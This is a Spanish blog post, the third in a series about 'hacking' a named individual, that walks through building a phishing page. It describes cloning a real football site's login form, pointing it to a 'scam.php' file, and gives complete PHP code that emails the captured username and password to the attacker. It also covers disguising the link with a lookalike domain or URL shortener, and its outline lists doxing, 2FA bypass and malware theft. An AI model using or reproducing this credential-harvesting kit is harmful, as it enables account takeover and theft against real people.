sábado, 15 de diciembre de 2018

Hackeando a Manolo el Barbas [Parte 3] - Engañando a nuestra víctima




Comenzamos la tercera parte de la serie de Posts "Hackeando a Manolo el Barbas", si no habéis leído los otros anteriores aconsejo hacerlo antes de seguir con este.

  1. Obtención de información pública de la persona o Doxing.
  2. Buscando y adivinando la contraseña.
  3. Obtención de contraseña con engaños y saltando el 2FA.
  4. Robo de datos a través de Malware.  
El último día intentamos buscar la contraseña por Google y adivinarla, pero esto es posible que no salga como queremos y no demos con ella, así que tenemos que ir al siguiente paso, vamos a engañar a nuestra víctima para que introduzca sus datos y ahí poder quedarnos con ellos. Vamos a usar alguna página que sepamos que usa, como en este caso mushofutbol.com.




Lo primero que haremos es irnos a la contraseña y darle a inspeccionar elemento, ya que hay una cosita que hay que modificar antes de copiarla entera.



Buscamos el formulario y le añadimos un action="scam.php", ya que ese scam.php es un fichero que crearemos un poco más tarde, encargado de guardar usuario y contraseña de nuestra victima.



Una vez hecho esto haremos click derecho y le daremos a guardar como, y esto se encargará de copiar la página con todos sus estilos e imágenes en una carpeta.

En la misma carpeta donde tenemos el archivo html creamos un php con el siguiente codigo:

Código: PHP
  1. <?php
  2. $user = trim($_POST['el name del input del user']);
  3. $password = trim($_POST['el name del input de pass']);
  4. $correoreceptor = "aquí cámbialo y pon tu correo";
  5. $asunto = "Ha caido una nueva víctima";
  6. $mensaje = "Usuario: ".$user."  -  Contraseña: ".$password;
  7. mail($correoreceptor, $asunto, $mensaje);
  8. header('Location: Pagina real');
  9. ?>

Una vez hecho esto habría que buscar un servidor donde hostear todo esto para poder enviarle el link a nuestra víctima, vamos a hacer nosotros nuestra prueba con Manolo. Para que no sospeche por la URL que le enviemos podemos comprar un dominio parecido al de mushofutbol.com, en mi caso voy a usar un acortador de URLs, así será más facil que se lo crea.









Cuando Manolo pulse el Link que verá algo de está forma.



Ahora solo tocaría esperar a que Manolo se conectase y desear que introdujese sus datos, yo tuve un poco de suerte y recibi un correo como este.



Cabe destacar que la probabilidad de que una víctima caiga en un engaño de este tipo depende mucho de como sea la mentira que hemos creado, en este caso sería más dificil que la víctima introdujera sus datos, en un futuro Post haremos algo más complejo y más interesante.

Saluti

Ci, es una copia de algo que ise tiempo, pero lo tenia que postear pa ceguir con cosa interesante

No hay comentarios: